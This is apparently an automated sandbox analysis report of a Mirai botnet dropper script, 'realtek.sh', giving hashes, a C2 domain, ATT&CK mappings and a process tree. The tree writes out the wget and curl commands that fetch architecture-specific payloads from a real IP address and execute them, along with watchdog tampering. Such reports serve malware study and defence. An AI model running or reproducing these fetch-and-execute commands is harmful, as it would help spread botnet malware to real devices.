mirai | bddd65175184f846b04b4f069c58f49fba2bc2271c6db1f554dbc6422f3a83e7

Analysis

max time kernel
131s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
17-12-2024 15:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

realtek.sh
Size

2KB
MD5

8510078f168c53967e4740ca6b0f0069
SHA1

73f906878752309ede2fcb06ab342489d3786d68
SHA256

bddd65175184f846b04b4f069c58f49fba2bc2271c6db1f554dbc6422f3a83e7
SHA512

e62d533be7be9156ff42548fa8634675d4829f6529699fd1a78674603d475b95e611d32aa2e4a11f73c3850796ab5fecab1dbba357b75732098af2a2af699a25

Score

10^/10

mirai unstable botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

servers.vlrt-gap.com

Extracted

Family

mirai

Botnet

UNSTABLE

Extracted

Family

mirai

Botnet

UNSTABLE

servers.vlrt-gap.com

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1549	chmod
1555	chmod
1573	chmod
1578	chmod
1505	chmod
1515	chmod
1531	chmod
1543	chmod
1584	chmod
1525	chmod
1537	chmod
1561	chmod
1567	chmod

Deletes itself 1 IoCs

pid	Process
1506	WTH

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/WTH	1506	WTH
/tmp/WTH	1517	WTH
/tmp/WTH	1526	WTH
/tmp/WTH	1532	WTH
/tmp/WTH	1538	WTH
/tmp/WTH	1544	WTH
/tmp/WTH	1550	WTH
/tmp/WTH	1556	WTH
/tmp/WTH	1562	WTH
/tmp/WTH	1568	WTH
/tmp/WTH	1574	WTH
/tmp/WTH	1579	WTH
/tmp/WTH	1585	WTH

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	WTH
File opened for modification	/dev/misc/watchdog	WTH

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	WTH
File opened for modification	/bin/watchdog	WTH

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1506	WTH

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1508	wget
1510	curl
1513	cat

Writes file to tmp directory 25 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/zmap.mips	curl
File opened for modification	/tmp/zmap.mpsl	wget
File opened for modification	/tmp/zmap.arm7	curl
File opened for modification	/tmp/zmap.sh4	curl
File opened for modification	/tmp/zmap.arm6	wget
File opened for modification	/tmp/zmap.arm7	wget
File opened for modification	/tmp/zmap.ppc	wget
File opened for modification	/tmp/zmap.ppc	curl
File opened for modification	/tmp/zmap.m68k	wget
File opened for modification	/tmp/zmap.sh4	wget
File opened for modification	/tmp/zmap.arc	curl
File opened for modification	/tmp/zmap.x86	wget
File opened for modification	/tmp/WTH	realtek.sh
File opened for modification	/tmp/zmap.mpsl	curl
File opened for modification	/tmp/zmap.arm5	curl
File opened for modification	/tmp/zmap.m68k	curl
File opened for modification	/tmp/zmap.spc	wget
File opened for modification	/tmp/zmap.i686	curl
File opened for modification	/tmp/zmap.x86	curl
File opened for modification	/tmp/zmap.mips	wget
File opened for modification	/tmp/zmap.arm	wget
File opened for modification	/tmp/zmap.arm	curl
File opened for modification	/tmp/zmap.arm5	wget
File opened for modification	/tmp/zmap.arm6	curl
File opened for modification	/tmp/zmap.spc	curl

/tmp/realtek.sh
/tmp/realtek.sh
1⤵
- Writes file to tmp directory
PID:1497
- /usr/bin/wget
  wget http://185.196.11.47/zmap.x86
  2⤵
  - Writes file to tmp directory
  PID:1498
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.x86
  2⤵
  - Writes file to tmp directory
  PID:1503
- /bin/cat
  cat zmap.x86
  2⤵
  PID:1504
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1505
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:1506
- /usr/bin/wget
  wget http://185.196.11.47/zmap.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1508
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1510
- /bin/cat
  cat zmap.mips
  2⤵
  - System Network Configuration Discovery
  PID:1513
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.mips zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1515
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1517
- /usr/bin/wget
  wget http://185.196.11.47/zmap.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1519
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1523
- /bin/cat
  cat zmap.mpsl
  2⤵
  PID:1524
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1526
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm
  2⤵
  - Writes file to tmp directory
  PID:1528
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arm
  2⤵
  - Writes file to tmp directory
  PID:1529
- /bin/cat
  cat zmap.arm
  2⤵
  PID:1530
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1532
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm5
  2⤵
  - Writes file to tmp directory
  PID:1534
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arm5
  2⤵
  - Writes file to tmp directory
  PID:1535
- /bin/cat
  cat zmap.arm5
  2⤵
  PID:1536
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1538
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm6
  2⤵
  - Writes file to tmp directory
  PID:1540
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arm6
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/cat
  cat zmap.arm6
  2⤵
  PID:1542
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1544
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arm7
  2⤵
  - Writes file to tmp directory
  PID:1546
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arm7
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/cat
  cat zmap.arm7
  2⤵
  PID:1548
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1550
- /usr/bin/wget
  wget http://185.196.11.47/zmap.ppc
  2⤵
  - Writes file to tmp directory
  PID:1552
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.ppc
  2⤵
  - Writes file to tmp directory
  PID:1553
- /bin/cat
  cat zmap.ppc
  2⤵
  PID:1554
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1555
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1556
- /usr/bin/wget
  wget http://185.196.11.47/zmap.m68k
  2⤵
  - Writes file to tmp directory
  PID:1558
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.m68k
  2⤵
  - Writes file to tmp directory
  PID:1559
- /bin/cat
  cat zmap.m68k
  2⤵
  PID:1560
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1562
- /usr/bin/wget
  wget http://185.196.11.47/zmap.spc
  2⤵
  - Writes file to tmp directory
  PID:1564
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.spc
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/cat
  cat zmap.spc
  2⤵
  PID:1566
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1567
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1568
- /usr/bin/wget
  wget http://185.196.11.47/zmap.i686
  2⤵
  PID:1570
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.i686
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/cat
  cat zmap.i686
  2⤵
  PID:1572
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1574
- /usr/bin/wget
  wget http://185.196.11.47/zmap.sh4
  2⤵
  - Writes file to tmp directory
  PID:1575
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.sh4
  2⤵
  - Writes file to tmp directory
  PID:1576
- /bin/cat
  cat zmap.sh4
  2⤵
  PID:1577
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1578
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1579
- /usr/bin/wget
  wget http://185.196.11.47/zmap.arc
  2⤵
  PID:1581
- /usr/bin/curl
  curl -O http://185.196.11.47/zmap.arc
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/cat
  cat zmap.arc
  2⤵
  PID:1583
- /bin/chmod
  chmod +x config-err-WSc3G3 netplan_sl6cks9p realtek.sh snap-private-tmp ssh-hlYRIaBlcMzr systemd-private-aff032fe4301446191c7feed4a3fb51f-bolt.service-GFuQdq systemd-private-aff032fe4301446191c7feed4a3fb51f-colord.service-gjAwvo systemd-private-aff032fe4301446191c7feed4a3fb51f-ModemManager.service-0OKl5o systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-resolved.service-qc2DKP systemd-private-aff032fe4301446191c7feed4a3fb51f-systemd-timedated.service-AE1q7R WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/WTH
  ./WTH realtek.selfrep
  2⤵
  - Executes dropped EXE
  PID:1585

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/WTH

Filesize
94KB

MD5
8ae4ac18a3b34fba963f59a42ff02fb7

SHA1
e9f75cf21972b2c953163d64d3cb89bd6a93cc1b

SHA256
c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a

SHA512
af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0

Download Submit
/tmp/WTH

Filesize
94KB

MD5
d81e9564b8b9d62d70bda936d927d875

SHA1
42706a08b0545984ed5a5cfbdff3fe2ab62ca552

SHA256
c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d

SHA512
282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886

Download Submit
/tmp/WTH

Filesize
74KB

MD5
9784e8db8dae548a6593644e3a168579

SHA1
afa7c4ce4b0122ec5f22dc37aa7658f41cb01008

SHA256
4278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129

SHA512
7f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c

Download Submit
/tmp/WTH

Filesize
49KB

MD5
241482e2337afd65af97770b37d5c90d

SHA1
c52137309238b4f1badf1e7bf01197bc48cd00fc

SHA256
01d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca

SHA512
cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00

Download Submit
/tmp/WTH

Filesize
152KB

MD5
f51e09e21e26b88091e5817482391af9

SHA1
35ac89537e69e933a9412877638edd2ddaf48195

SHA256
ff15bf021c5804b34110ecab8a8c86dd399c60b246cb626f536a000b26b27e96

SHA512
13a46b95db2323015267dd034bde6b2517ea447d091ba7b702aa249ea7172d876156554387b9a5640490b97217f48f843b28f00f65fdc45948a93fbbdb5dd1c3

Download Submit
/tmp/zmap.x86

Filesize
61KB

MD5
d1f752879420a6d45d76f130281392d6

SHA1
46a92c0efae33b8a826dc48daa3dbf3d30be4a15

SHA256
4fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914

SHA512
91e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads